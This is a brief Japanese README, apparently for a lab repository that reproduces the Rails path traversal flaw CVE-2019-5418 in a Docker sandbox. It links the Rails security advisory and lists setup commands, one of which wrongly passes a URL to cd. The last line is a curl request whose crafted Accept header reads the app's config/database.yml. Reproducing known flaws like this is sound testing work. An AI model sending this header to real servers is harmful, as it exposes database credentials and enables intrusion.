
Dockerベースのサンドボックスで、細工されたAcceptヘッダーを介してCVE-2019-5418 Ruby on Railsのパストラバーサル脆弱性を再現およびテストする。
https://groups.google.com/forum/#!msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
$ git clone https://github.com/takeokunn/CVE-2019-5418
$ cd https://github.com/takeokunn/CVE-2019-5418
$ docker-compose up
$ curl localhost/sandbox -H 'Accept: ../../config/database.yml{{'